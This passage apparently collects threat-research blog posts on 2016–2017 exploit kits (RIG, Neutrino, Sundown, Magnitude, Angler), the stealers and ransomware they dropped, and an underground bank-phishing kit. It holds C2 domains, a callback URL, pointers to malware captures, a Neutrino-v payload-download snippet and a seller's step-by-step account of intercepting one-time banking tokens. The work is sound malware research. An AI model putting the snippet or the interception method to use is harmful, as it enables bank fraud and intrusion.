ebula2017/02/27marginswiss.divingfuelsalary.trade93.190.141.200Nebula2017/02/27outputfruit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27rainstormpromotion.gramsunshinesupply.club93.190.141.39Nebula2017/02/27reindeerprofit.divingfuelsalary.trade93.190.141.200Nebula2017/02/27reminderdonna.divingfuelsalary.trade93.190.141.200Nebula2017/02/27startguarantee.gramsunshinesupply.club93.190.141.39Nebula2017/02/27supplyheaven.gramsunshinesupply.club93.190.141.39Nebula2017/02/27transportbomb.gramsunshinesupply.club93.190.141.39Nebula2017/02/28afforddrill.xzv4rzuctndfo.club93.190.141.45Nebula2017/02/28agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/02/28bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/02/28burglarsatin.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28certificationplanet.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28chooseravioli.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28coachadvantage.reportattackconifer.site93.190.141.39Nebula2017/02/28databasesilver.reportattackconifer.site93.190.141.39Nebula2017/02/28date-of-birthtrout.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28dependentswhorl.jsffu2zkt5va.trade93.190.141.45Nebula2017/02/28derpenquiry.87692f31beea22522f1488df044e1dad.top93.190.141.45Nebula2017/02/28domainconsider.mxkznekruoays.trade93.190.141.200Nebula2017/03/01agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01authorparticle.390a20778a68d056c40908025df2fc4e.site93.190.141.45Nebula2017/03/01bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/01bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02actressheight.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02agesword.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02applywholesaler.tboapfmsyu.stream93.190.141.200Nebula2017/03/02approvepeak.knowledgedrugsaturday.club93.190.141.45Nebula2017/03/02bakermagician.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02bombclick.alvdxq1l6n0o.stream93.190.141.166Nebula2017/03/02borrowfield.77e1084e.pro93.190.141.45Nebula2017/03/02boydescription.356020817786fb76e9361441800132c9.win93.190.141.39Nebula2017/03/02buglecommand.textfatherfont.info93.190.141.39Nebula2017/03/02buysummer.77e1084e.pro93.190.141.45Nebula2017/03/02captaincertification.77e1084e.pro93.190.141.45Nebula2017/03/02chargerule.textfatherfont.info93.190.141.39Nebula2017/03/02cityacoustic.textfatherfont.info93.190.141.39Nebula2017/03/02clickbarber.356020817786fb76e9361441800132c9.win93.190.141.39Nebula

CVE-2016-7200 & CVE-2016-7201 are vulnerabilities in the Chakra JavaScript scripting engine in Microsoft Edge. Reported by Natalie Silvanovich of Google Project Zero, those have been fixed  in november 2016 (MS16-129) by Microsoft.Note : No successful exploitation seen despite integration tries.On 2017-01-04 @theori_io released a POCProof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) —https://t.co/DnwQt5giMB— Theori (@theori_io) 4 janvier 2017providing again (cf CVE-2016-0189) ready-to-use code to Exploit Kit maintainer.After not far from 6 months without new exploit integrated in an EK ecosystem which has lost its innovation locomotive (Angler) , the drive-by landscape is struggling to stay in shape. Low infection rate means more difficulties to properly convert bought traffic.The exploits are spotted first in Sundown, but integration in RIG/Empire/Neutrino/Magnitude/Kaixin should be a matter of hours/days.[edit : 2017-01-10]​I have been told that with Win10 1607, Microsoft Edge has some quite strong mitigation: no WinExec, no CreateProcess, no ShellExecute, meaning every child process creation is blocked. The PoC might need a little more "magic powder" to work there.[/edit]Sundown:2017-01-06Sundown EK firing CVE-2016-7200/7201 to Edge 2017-01-06No exploitation here thoughFiddler: Sundown_Edge__CVE-2016-7201_170106.zip (password is malware)Out of topic: expected payload in that infection chain was zloader. (other payload seen in past weeks dropped via Sundown : Zeus Panda, Neutrino Bot, Dreambot, Chthonic, Andromeda, Smokebot, Betabot, Remcos, IAP, RTM, Kronos, Bitcoin Miner)Neutrino:2017-01-14--Thanks to Trendmicro for the multiple inputs that allowed me to keep plugged to this infection chain.--So as explained previously Neutrino is now in full private mode and fueled via Malvertising bought to several ad agencies (e.g. ZeroPark, ClickAdu, PropellerAds, HillTopAds) by a Traffer actor which I tag as NeutrAds. Their infection chain is now accepting/redirecting Microsoft Edge Browser as well.Without big surprise a new exploit is included in the Flash bundle : nw27 >  CVE-2016-7200/7201.NeutrAds redirect is now  accepting Edge traffic - 2017-01-14Neutrino Embedding CVE-2016-7200/7201 - 2017-01-14(Neutrino-v flash ran into Maciej ‘s Neutrino decoder )Extracted CVE-2016-7200/7201  elements - 2017-01-14Note: i did not get infection with- Edge 25.10586.0.0 / EdgeHTML 13.10586- Edge 20.10240.16384.0Fiddler&Pcap : Neutrino-v_CVE-2016-72007201_170114.zip  (Password is malware)Extracted exploits: Neutrino_2017-01-14.zip (Password is malware)reveiled[.space|45.32.113.97 - NeutrAds Filtering Redirectorvfwdgpx.amentionq[.win|149.56.115.166 - Neutrino Payload in that pass : Gootkit - b5567655caabb75af68f6ea33c7a22dbc1a6006ca427da6be0066c093f592610Associated C2 :buyyou[.org | 204.44.118.228felixesedit[.comfastfuriedts[.org monobrosexeld[.orgSo those days, in Asia you'll most probably get Cerber and in EU/NA you'll most probably get GootkitMISP : taxonomy illustrating some NeutrAds into Neutrino-v recorded activity (and post infection)Kaixin:2017-01-15 Finding by Simon ChoiCVE-2016-7200/7201 code fired by Kaixin - 2017-01-16Fiddler : Kaixin_2017-01-16.zip (Password is malware)Out of topic: payload in another pass (not fired by this exploit) was Blackmoon/Banbra 6c919213b5318cdb60d67a4b4ace709dfb7e544982c0e101c8526eff067c8332Callback:http://r.pengyou[.com/fcg-bin/cgi_get_portrait.fcg?uins=1145265195http://67.198.186[.254/ca.php?m=525441744D5441744D6A63744E3055744D554D745130493D&h=437Edits:2016-11-10 - Adding information about mitigation on Edge2016-11-14 - Adding Neutrino2016-11-16 - Fixed the screenshot for Neutrino. Was stating CVE-2016-4117 was there. It's not2016-11-16 - Adding KaixinRead More:Three roads lead to Rome - Qihoo360 - 2016-11-29Proof-of-Concept exploit for Edge bugs (CVE-2016-7200 & CVE-2016-7201) - Theori-io - 2017-01-04

  Around the middle of August many infection chains transitioned to RIG with more geo-focused bankers and less CryptXXX (CryptMic) Ransomware. Picture 1: Select Drive-by landscape - Middle of August 2016 vs Middle of July 2016RIG += internal TDS :Trying to understand that move, I suspected and confirmed the presence of an internal TDS (Traffic Distribution System) inside RIG Exploit Kit [Edit 2016-10-08 : It seems this functionality is limited to Empire Pack version of RIG]I believe this feature appeared in the EK market with Blackhole (if you are aware of a TDS integrated earlier directly in an EK please tell me) Picture2: Blackhole - 2012 - Internal TDS illustrationbut disappeared from the market with the end of Nuclear Pack Picture3: Nuclear Pack - 2016-03-09 - Internal TDS illustrationand Angler EK Picture 4 : Angler EK - Internal TDS illustrationThis is a key feature for load seller. It is making their day to day work with traffic provider far easier . It allows Exploit Kit operator to attach multiple payloads to a unique thread. The drop will be conditioned by Geo (and/or OS settings) of the victim.Obviously you can achieve the same result with any other exploit kit…but things are a little more difficult. You have to create one Exploit Kit thread per payload, use an external TDS (like Keitaro/Sutra/BlackHat TDS/SimpleTDS/BossTDS, etc…) and from that TDS, point the traffic to the correct Exploit Kit thread (or, if you buy traffic, tell your traffic provider where to send traffic for each targeted country). Picture 5: A Sutra TDS in action in 2012 - cf The path to infection RIG += RC4 encryption, dll drop and CVE-2016-0189:Around 2016-09-12 a variation of RIG (which i flag as RIG-v in my systems) appeared.A slightly different landing obfuscation, RC4 encoding, Neutrino-ish behavioral and added CVE-2016-0189 Picture 6: RIG-v Neutrino-ish behavioral captured by Brad Spengler’s modified cuckoo Picture 7: CVE-2016-0189 from RIG-v after 3 step de-obfuscation pass.Neutrino waves goodbye ?On 2016-09-09 on underground it has been reported a message on Jabber from the Neutrino seller account :“we are closed. no new rents, no extends more”This explains a lot. Here are some of my last Neutrino pass for past month. Picture 8: Some Neutrino passes for past month and associated taxonomy tags in MispAs you can see several actors were still using it…Now here is what i get for the past days : Picture 9: Past days in DriveBy land Not shown here, Magnitude is still around, mostly striking in AsiaDay after day, each of them transitioned to RIG or “RIG-v”. Around the 22nd of September 2016 the Neutrino advert and banner disappeared from underground. Picture 10: Last banner for Neutrino as of 2016-09-16Are we witnessing the end of Neutrino Exploit Kit ? To some degree. In fact it looks more like Neutrino is going in full “Private” mode “a la” Magnitude.Side reminder : Neutrino disappeared from march 2014 till november 2014A Neutrino VariantSeveral weeks ago, Trendmicro (Thanks!!) made me aware of a malvertising chain they spotted in Korea and Taiwan involving Neutrino. Picture 11: Neutrino-v pass on the 2016-09-21Upon replay I noticed that this Neutrino was somewhat different. Smoother CVE-2016-4117, more randomization in the landing, slightly modified flash bundle of exploits Picture 12: Neutrino-v flash ran into Maciej ‘s Neutrino decoder Note the pnw26 with no associated binary data, the rubbish and additionalInfoA Sample : 607f6c3795f6e0dedaa93a2df73e7e1192dcc7d73992cff337b895da3cba5523 Picture 13: Neutrino-v behavioral is a little different : drops name are not generated via the GetTempName api function k2(k) { var y = a(e + "." + e + "Request.5.1"); y.setProxy(n); y.open("GET", k(1), n); y.Option(n) = k(2); y.send(); if (200 == y.status) return Rf(y.responseText, k(n)) };Neutrino-v ensuring Wscript will use the default proxy (most often when a proxy is configured it’s only for WinINet , WinHTTP proxy is not set and Wscript will try to connect directly and fail)I believe this Neutrino variant is in action in only one infection chain (If you think this is inaccurate, i’d love to hear about it) Picture 14: Neutrino-v seems to be used by only one actor to spread Cerber 0079xThe actor behind this chain is the same as the one featured in the Malwarebytes Neutrino EK: more Flash trickery post.Empire Pack:Coincidentally a new Exploit Kit is being talked about underground : Empire Pack. Private, not advertised. Picture 15: King of Loads - Empire Pack PanelSome might feel this interface quite familiar…A look a the favicon will give you a hint Picture 16: RIG EK favicon on Empire Pack panel Picture 17: RIG PanelIt seems Empire Pack project was thought upon Angler EK disappearance and launched around the 14th of August 2016.[Speculation] I think this launch could be related to the first wave of switch to RIG that occurred around that time. I think, Empire Pack is a RIG instance managed by a Reseller/Load Seller with strong underground connections. [/Speculation]RIG-v is a “vip” version of RIG. Now how exactly those three elements (RIG, RIG-v, Empire Pack) are overlapping, I don’t know. I am aware of 3 variants of the API to RIGapi.php : historical RIG api3.php : RIG with internal TDS [ 2016-10-08 :  This is Empire Pack. Appears to be using also remote_api after this post went live. I flag it as RIG-E ]remote_api.php : RIG-vBut Empire Pack might be api3, remote_api, or a bit of both of them.By the way RIG has also (as Nuclear and Angler endup doing) added IP Whitelisting on API calls to avoid easy EK tracking from there.   :-" (Only whitelisted IP - from declared redirector or external TDS - can query the API to get the current landing) ConclusionLet’s just conclude this post with statistics pages of two Neutrino threads Picture 18: Neutrino stats - Aus focused thread - 2016-07-15Picture 19: Neutrino stats on 1 Million traffic - 2016-06-09“We will be known forever by the tracks we leave”Santee Sioux TribeSome IOCsDateDomainIPComment2016-10-01szsiul.bluekill[.]top137.74.55.6Neutrino-v2016-10-01twqivrisa.pinkargue[.]top137.74.55.7Neutrino-v2016-10-01u0e1.wzpub4q7q[.]top185.117.73.80RIG-E (Empire Pack)2016-10-01adspixel[.]site45.63.100.224NeutrAds Redirector2016-09-30re.flighteducationfinancecompany[.]com109.234.37.218RIG-v2016-09-28add.alislameyah[.]org193.124.117.13RIG-v2016-09-28lovesdeals[.]ml198.199.124.116RIG-v2016-09-27dns.helicopterdog[.]com195.133.201.23RIG2016-09-26sv.flickscoop[.]net195.133.201.41RIG2016-09-26red.truewestcarpetcare[.]com195.133.201.11RIG-v2016-09-26oitutn.yellowcarry[.]top78.46.167.130NeutrinoAcknowledgementsThanks Malc0de, Joseph C Chen (Trendmicro), Will Metcalf ( EmergingThreat/Proofpoint) for their inputs and help on multiple aspect of this post.Edits2016-10-03 :Removed limitation to KOR and TWN for Neutrino-v use by NeutrAds as Trendmicro informed me they are now seeing them in other Geos.Added explanation about the IP whitelisting on RIG API (it was not clear)2016-10-08 :Updated with gained information on Empire Pack2016-11-01 :RIG standard is now also using the pattern introduces past week by RIG-v. It's now in version 4.https://twitter.com/kafeine/status/790482708870864896RIG panelThe only instance of RIG using old pattern is Empire Pack (which previously could be guessed by domains pattern)2016-11-18 : Empire (RIG-E) is now using RC4 encoding as well. (still on old pattern and landing)RIG-E Behavioral2016-12-03RIG-v has increased filtering on IP ranges and added a pre-landing to filter out non IE traffic.2016-12-03 RIG-v Pre-landingRead MoreRIG’s Facelift - 2016-09-30 - SpiderLabs Is it the End of Angler ? - 2016-06-11 Neutrino : The come back ! (or Job314 the Alter EK) - 2014-11-01 Hello Neutrino ! - 2013-06-07The path to infection - Eye glance at the first line of “Russian Underground” - 2012-12-05

Gift for SweetTail-Fox-mlp by Mad-N-MonstrousSmall data drop about another Pony fork : Fox stealer.First sample of this malware I saw was at beginning of September 2016 thanks to Malc0de. After figuring out the panel name and to which advert it was tied we were referring to it as PonyForx.Advert :2016-08-11 - Sold underground by a user going with nickname "Cronbot"--------Стилер паролей и нетолько - Fox v1.0Мы выпускаем продукт на продажу. Уже проходит финальная стадия тестирования данного продукта.О продукте : 1. Умеет все что умеет пони. + добавлен новый софт.2. Актуален на 2016 год.3. Написан на С++ без дополнительных библиотек.4. Админка от пони.Условия : 1. Только аренда.2. Распространяется в виде EXE и DLL.3. Исходники продавать не будем.Аренда 250$ в месяц.Исходники 2000$ разово.----Translated by Jack Urban : ----Password stealer and more - Fox v.1.0We are releasing the product for general sale. Final stage of testing for this product is already underway.About the product:1. Is able to do everything that pony does. + new software has been added.2. Relevant for 2016.3. Written in C++ without additional libraries.4. Admin from pony.Conditions:1. For rent only.2. Distributed as an EXE and DLL.3. We will not be selling the source.Rent is $250 a month.Originals are a 2000$ one time fee. --------It's being loaded (with Locky Affid 13) by the Godzilla from ScriptJS (aka AfraidGate) group .MISP taxonomy tags reflecting ScriptJS activity in the last months(note : it's not the first time this group is pushing a stealer, they were dropping Pony with their Necurs between August and December 2015 [1] )2016-09-26 - ScriptJS infection chain into Neutrino into Godzilla loader into PonyForx and Locky Affid 13Here we can see the browsing history of the VM being sent to PonyForx (Fox stealer) C2Fox stealer (PonyForx) fingerprint in CuckooSample :cca1f8ba0be872ec86755e3defbb23c8fe4a272a6b4f7ec651302c5cddc5e183Associated C2:blognetoo[.]com/find.php/helloblognetoo[.]com/find.php/datablognetoo[.]com|104.36.83.52blognetoo[.]com|45.59.114.126Caught by ET rule :2821590 || ETPRO TROJAN Win32.Pony Variant Checkin[1] ScriptJS's Pony :master.districtpomade[.]com|188.166.54.203 - 2015-08-15 Pony C2 from ScriptJS​js.travelany[.]com[.]ve|185.80.53.18 - 2015-12-10 Pony C2 from ScriptJSRead More : http://pastebin.com/raw/uKLhTbLs few bits about ScriptJSInside Pony 1.7 / Fareit C&C - Botnet Control Panel - 2012-06-27Pony 1.9 (Win32/Fareit) - 2013-05-23 - Xylitol

Spotted by Symantec in the wild  patched with MS16-051 in may 2016, CVE-2016-0189 is now being integrated in Exploit Kit.Neutrino Exploit Kit :Here 2016-07-13 but i am being told that i am late to the party.It's already [CN] documented hereNeutrino after ScriptJS redirector dropping Locky Affid 13- 2016-07-13Flash sample in that pass : 85b707cf63abc0f8cfe027153031e853fe452ed02034b792323eecd3bc0f7fd(Out of topic payload : 300a51b8f6ad362b3e32a5d6afd2759a910f1b6608a5565ddee0cad4e249ce18 - Locky Affid 13 ) Thanks to Malc0de for invaluable help here :)Files Here: Neutrino_CVE-2016-0189_160714 (Password is malware - VT Link)Sundown :Some evidence of CVE-2016-0189 being integrated in Sundown were spotted on jul 15 by @criznashOn the 16th I recorded a pass where the CVE-2016-0189 had his own calls :Sundown exploiting CVE-2016-0189 to drop Smokebot on the 2016-07-16(Out of topic payload :  61f9a4270c9deed0be5e0ff3b988d35cdb7f9054bc619d0dc1a65f7de812a3a1 beaconing to : vicolavicolom.com | 185.93.185.224 )Files : Sundown_CVE-2016-0189_160716 (password is malware)RIG:I saw it on 2016-09-12 but might have appeared before.RIG successfully exploiting CVE-2016-0189 - 2016-09-12CVE-2016-0189 from RIG after 3 step decoding passFiles : RIG_2016-0189_2016-09-12 (password is malware)Magnitude:Here pass from 2016-09-16 but is inside since at least 2016-09-04 (Source : Trendmicro - Thanks)CVE-2016-0189 in Magnitude on 2016-09-16Sorry i can't share fiddler publicly in that case (Those specific one would give to attack side too much information about some of the technics that can be used - You know how to contact me)Out of topic Payload:  Cerbera0d9ad48459933348fc301d8479580f85298ca5e9933bd20e051b81371942b2cGrandSoft:Spotted first on 2017-09-22 here is traffic from 2018-01-30 on : Win10 Build 10240 - IE11.0.10240.16431 - KB3078071CVE-2016-0189 in GrandSoft on 2018-01-30Out of topic Payload:  GandCrab Ransomwarea15c48c74a47e81c1c8b26073be58c64f7ff58717694d60b0b5498274e5d9243Fiddler here : GrandSoft_WorkingonIE11_Win10d.zip (pass is malware) Edits :2016-07-15 a previous version was stating CVE-2015-5122 for nw23. Fixed thanks to @dnpushme2016-07-20 Adding Sundown.2016-09-17 Adding RIG2016-09-19 Adding Magnitude2018-01-30 Adding GrandSoft (but appeared there on 2017-09-22)Read More :[CN] NeutrinoEK来袭：爱拍网遭敲诈者病毒挂马 2016-07-14 - Qihoo360Patch Analysis of CVE-2016-0189 - 2016-06-22 - TheoriInternet Explorer zero-day exploit used in targeted attacks in South Korea - 2016-05-10 - SymantecNeutrino EK: fingerprinting in a Flash - 2016-06-28 - MalwarebytesPost publication Reading :Exploit Kits Quickly Adopt Exploit Thanks to Open Source Release - 2016-07-14 - FireEye

Everyone looking at the DriveBy landscape is seeing the same : as Nuclear disappeared around April 30th,  Angler EK has totally vanished on June 7th. We were first thinking about Vacation as in January 2016 or maybe Infrastructure move. But something else is going on.---On the Week-End of the 4-5th of June I noticed that the ongoing malvertising from SadClowns was redirecting to Neutrino Exploit Kit (dropping Cerber)EngageBDR malvertising redirecting to SadClowns infra pushing traffic to Neutrino to Drop Cerber RansomwareOn the 6th I noticed several group migrating to RIG, Neutrino or even Sundown.But I got speechless when I noticed that GooNky had switched to Neutrino to spread their CryptXXX U000001 and U000006.They were sticking exclusively to Angler EK since years and their vacation were synchronized with Angler's in January.Checking all known to me infection path I could hardly find some Angler....last one were behind the EItest infection chain on the night of the 6th to 7th of June.Last Angler pass I captured on 2016-06-07EITest into Angler dropping CryptXXX 3.200 U000017On June 7th around 5:30 AM GMT my tracker recorded its last Angler hit :Last Hit in my Angler tracker.After that...RIG, Neutrino instead of Angler almost everywhere.[Side note: Magnitude is still around...But as mentioned earlier it's a One Actor operation since some time]Aside SadClowns and GooNky here are two other big (cf traffic volume) group which transition has not been covered already"WordsJS"  (named NTL/NTLR by RiskIQ) into Neutrino > CryptXXX U0000102016-06-10"ScriptJS" (Named DoublePar by RiskIQ and AfraidGate by PaloAlto) into Neutrino > CryptXXX U000011This gang  was historically dropping Necurs, then Locky Affid13 before going to CryptXXXIllustrating with a picture of words and some arrows:MISP : select documented EK pass with associated tags.1 arrow where you would have find Angler several days before.(+ SadClowns + GooNky not featured in that selection)With the recent 50 arrests tied to Lurk in mind and knowing the infection vector for Lurk was the "Indexm" variant of Angler between 2012 and beginning of 2016...we might think there is a connection and that some actors are stepping back.Another hint that this is probably not vacation "only" for Angler is that Neutrino changed its conditions on June 9th. From 880$ per week on shared server and 3.5k$ per month on dedicated, Neutrino doubled the price to 7k$ on dedicated only (no more per week work). Such move were seen in reaction to Blackhole's coder (Paunch) arrest in October 2013.So is this the End of Angler ? The pages to be written will tell us.“If a book is well written, I always find it too short.” ― Jane Austen, Sense and SensibilityPost publication notes:[2016-06-12]RIG : mentioned they were sill alive and would not change their Price.Maybe unrelated to RIG mention, Neutrino updated his thread as announced previously on underground but conditions are revisited :------Google translate:-----Tarif week on a shared server:Rent: $ 1500Limit: 100k hosts per dayOne-time daily discharge limits: $ 200Rate per month on a dedicated server:Rent: $ 4000Limits: 500k hosts per day, and more - on an individual basis.One-time daily discharge limits: $ 200----------------So now only price per week is doubled and month rate + ~20%[2016-06-13]Our exploit kit stats for the last two weeks… Angler dives, Neutrino soars. pic.twitter.com/RcYAH6tVck— News from the Lab (@FSLabs) June 13, 2016Acknowledgement:Thanks to Will Metcalf (Emerging Threats/Proofpoint) who made the replay of SadClowns' malvertising possible. Thanks to EKWatcher and Malc0de for their help on several points.Read More :XXX is Angler EK - 2015-12-21Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC NewsNeutrino EK and CryptXXX - 2016-06-08 - ISCSansLurk Banker Trojan: Exclusively for Russia - 2016-06-10 - Securelist - KasperskyHow we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

Discovered being exploited in the wild by FireEye [1] on May 8, 2016, patched 4 days later with Flash 21.0.0.242, CVE-2016-4117 is making its way to Exploit Kits.Magnitude :CVE confirmed by FireEye - Thanks !On 2016-05-21 Magnitude is firing an exploit to Flash up to 21.0.0.213.Magnitude firing exploit to Flash 21.0.0.213 - 2016-05-21For now i did not get exploitation in the different pass i tried but in the Flash exploit we can see some quite explicit imports : import com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation;Magnitude Flash Exploit showing import of the DeleteRangeTimelineOperationSpotted sample :  f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0aFiddler sent here.Updates to come as it appears to be a work in progress.Neutrino :2016-05-23Spotted by Eset.2016-05-23 Neutrino successfully exploit CVE-2016-4117 on Flash 21.0.0.213 and drop here CryptXXXSample in that pass : 30984accbf40f0920675f6ba0b6daf2a3b6d32c751fd6d673bddead2413170e8Fiddler sent here (Password is malware)Out of topic payload: 110891e2b7b992e238d4afbaa31e165a6e9c25de2aed442574d3993734fb5220 CryptXXXAngler EK:2016-05-23CVE identification by Henri Nurmi from F-Secure. Thanks !Angler EK successfully exploit Flash 21.0.0.213 on 2016-05-23 dropping DridexSample in that pass : 310528e97a26f3fee05baea69230f8b619481ac53c2325da90345ae7713dcee2Fiddler sent hereOut of topic payload  : 99a6f5674b738591588416390f22dedd8dac9cf5aa14d0959208b0087b718902Most likely Dridex 123 targeting Germany based on distribution path.Sundown :  [3]2016-08-27Sample in that pass : cf6be39135d8663be5241229e0f6651f9195a7434202067616ae00712a4e34e6 Fiddler sent here  (password : malware)Read More:[1] CVE-2016-4117: Flash Zero-Day Exploited in the Wild - 2016-05-13 - Genwei Jiang - FireEye[2] New Flash Vulnerability CVE-2016-4117 Shares Similarities With Older Pawn Storm Exploit - 2016-05-13 - Moony Li - TrendMicro[3] Sundown EK – Stealing Its Way to the Top - 2016-09-02 - Spiderlabs

Fallout Vault Boy maskThe goal of the post is to open-source data on a kit that has been seen live impersonating bank portal. This is mostly Raw data, few part only will be "google translated".On September 2015 the 16th,  an advert about a multipurpose kit appeared underground :------------------------------------------By: [Redacted]Subject : Инжекты | Админки | Фейки, -50% от рыночных цен -Доброе время суток всем.Рад предоставить свои услуги по разработке следующих проектов:Инжекты;Grabers 80-150$*;Pasive ATS 500-800$*;Active ATS 800-1500$*;Tooken Panels 400-800$*;Replacers 200-400$*;И многое другое...Фейки;Простые клоны 70-150$*;Продвинутые с перехватом 200-500$*;Админки на пхп;Под любые нужды ...*данные цены служат ориентиром. Реальная цена будет зависеть от каждого техзадания индивидуальноJabber( [Redacted]@exploit.im )ICQ( 6[Redacted]8 )------------------------------------------Google Translated as :------------------------------------------By: [Redacted]Subject: Inject | admin area | Fakes, -50% of the market price -Good time of day to all.I am glad to provide services for the development of the following projects:Inject;Grabers 80-150 $ *;Pasive ATS 500-800 $ *;Active ATS 800-1500 $ *;Tooken Panels 400-800 $ *;Replacers 200-400 $ *;And much more...fakes;Simple clones 70-150 $ *;Advanced interception $ 200-500 *;Admin Center on php;Under any needs ...* These prices are a guide. The actual price will depend on each individual ToRsJabber ([Redacted] @ exploit.im)ICQ (6[Redacted]8)------------------------------------------NB : The Subject became later :--Инжекты | Админки | Фейки | Android Инжекты, -50% от рыночных цен --Inject | admin area | fakes | Inject Android, 50% of the market price ---Seller later added :------------------------------------------Последее время очень мнoго вопросов по поводу как работает перехват на скам странице. Решил детально описать процес чтобы изначально не вводить клиентов в заблуждение.В самом начале надо понять что такое "СКАМ СТАНИЦА"."СКАМ СТРАНИЦА"- это копия реальной странички логина в банк ,которая находится на нашем сервере с похожем на банк доменом. Все детали вводимые на ней будут лететь к нам.Далее уже на выбор, или дание идут на емайл, или на специально сделанную админку.Тоесть суть замута такова:жертва попадает на нашу страницу ->вводит данные->потом наша страница кидает жертву обратно на оригинал ->и мы поже ипользуем данные сами чтобы войти..| Это самый примитивный пример , на самом деле все чуток сложнее и зависит от фантазии заказа .Дальше надо понять что такое "ПЕРЕХВАТ"."ПЕРЕХВАТ" - eто вид обмана, очень часто ипользуетса в инжектах. Само название говорит за себя.Инжект перехватывает дание в рельном времени и присылает нам . В это время жертва как обычно ждет с гиф на экране,а вы заходите вместо него.| Зачем это надо?Затем что если для перевода вам требуется дополнительно второй пароль/смс/тукен то можно это запросить ,пока жертва ждёт, через специально сделанные команды в админке.Основной бенефит что это можно делать повторно ,много раз.|| Перехват на скам страничке работать точно также . Жертвa вводить дание и ждет пока мы его спросим то что нам надо.|Поэтапно:Преставим себе что есть банк где на вход надо UserName и Password . На активацию перевода по IBAN надо нoмер с тукен-прибора (Pin1) и для переводa надо ввести номер в тукен-прибор и тукен-прибор даст нам номер обратно (Pin2)Теперь преставим себе что у нас есть скам странница на этот банк , которая будет отсылать нам получение даные для входа и потом покажет заставку жертве с просьбой подождать. Мы находимся на другом конце в админке и наблюдаем такую катину .Краткое пособие по админке."I'am Online"- показывает находится ли оператор в админке , если "Off-line" то все жертвы будут перенаправлены обратно на оригинал страницу.Колонка "Keys" это есть полученные детали для входа.Колонка "Pin" это для получених тукенов/пинов .Колонка "Task" для добавленья операции по запросу тукена/пинов .Колонка "Redirect" показывает релле редиректа конкретной жертвы . Если поставить "On" то жертва будет перенапрвлена на оригинал сразу.| *Если жертва мегает красним то это значит что жертва какраз ждет от вас комадуИ так , на даном этапе у нас есть логины для входа , и ждущий человвек на нашей странице .Входим, идем на активацию IBAN . Там нас спрашивает Pin1/Tooken1 .Мы идем обратно на админку и нажимаем запрос операции. У нас откроется окно с выбором операций .Нажимаем на "ask Pin1" и жертва видит вот это:Дальше все просто. Жертва вводить "pin1" и он приходит к нам на админку . А жертва в это время снова видит пред собой заставку "подождите" .Если пин подошол, идем на перевод и такимже способом просим "pin2". Важно понимать что это все можно повторять много раз и после неверного пина можно снова его запросить .Если залив ушол , ставим "Redirect" на "On" и юсер уходит на оригинал. Или в продвинутых системах можно показать ему техроботы и попросить зайти попоже.Вот и все!**Все тексты на английском по админке написаны с ошибками , я это знаю ).Делал очень быстро . Никак не дойдут руки сделать до конца ------------------------------------------On march 2016 the 9th :------------------------------------------доброе время суток всем.С великой радостью рад предложить свои услуги по разработке инжектов под мобильные устройства для многих публичных андроид ботов .Цены зависят от тех заданий .Пример роботы на один из UK линков можно посмотреть тут [REDACTED]pass:demoWith great joy, I am pleased to offer its services on developing injects for mobile devices for many public android bots.The prices depend on those jobs.An example of one of the injects on the UK link can be found here [REDACTED]pass:demo------------------------------------------Files mirrored here. (pass: demo)On march 2016 the 16th:------------------------------------------Ladie's and Gentlemen's.Don't miss out some fresh and well-designed mobile injects for UK.9 common links.Hight % success task.------------------------------------------On march 2016 the 31st:------------------------------------------Доброе время суток всем.Последним временем много клиентов задают одни и те же вопросы связаны с видео o работе перехвата на Нидерланды.Я решил более детально описать систему работы и поставить ее где-то в общедоступном месте.Прежде всего пару строчек хотел бы написать o админ панели. Oна называется Universal Admin. называется она не просто так Универсал,у нее реализована возможность поддерживать много разных проектов таких как: Tooken intercept,Text manager,Log parser,Drop manager и многое другое.[2 images here...not available at dump time]Не обращайте внимания на разные цвета и стили на Скринах ,стили меняются тоже прямо с админки.[1 image here...not available at dump time]Tо есть админ панель одна а плагинов под нее может быть много.Hа видео Вы видели эту админку с плагином Tooken intercept + Text manager.Text manager-это менеджер текстовых блоков и название кнопок, которые будут автоматически вставляется в вашы страницы,инжекты и фишинг сраницы.[1 images here...not available at dump time]Все что надо сделать для работы это создать текстовый блок с определенным ID ,потом на вашей странице создать элемент с этим же ID ивставить одну функцию в конец документа.Для примера: У вас есть инжект в котором есть определенная Легенда запроса дополнительной информации.Чтобы изменить эту Легенду вам как минимум надо разбираться в HTML и как максимум пересобирать конфигурацию бота.С помощью текстового менеджера в моей админке все что вам надо это поменять текст в определенном блоке и нажать сохранить.Tooken intercept- это собственно то о чем мы будем сейчас говорить.Не важно каким способом Вы стараетесь обмануть жертву (Injec ,phishing page) цель является добытие определенного пакета информации .Для примера скажем у вас есть Paypal Phishing page с помощью которой вы добывайте username и пароль. эти данные отсылаются куда-то наадминку в нашем случае это Universal Admin.Username и пароль это и есть тот самый пакет информации который после отправки формы сохраняются у вас ,а кокретно вот тут[1 image here...not available at dump time]Использовать эту информацию можно по-разному в зависимости от вашего проекта.Одним из методов использования этой информации является перехват(intercept) ,то есть использовать информацию в реальном времени прямо сейчас.Вы перехватили username и пароль и вместо жертвы попадаете на ак ,пока жертва ждет думая что страница грузится.В случае с PayPal использования перехвата не совсем обязательно, так как полученные пакет информации а именно username и пароль Выможете использовать и через неделю. Но в связи с тем что последнее время много контор используют One Time password(Tooken),которые действительны только 30 секунд, обойтись без Tooken interstep нереально. Tooken intercept дает вам возможность использовать тот самый 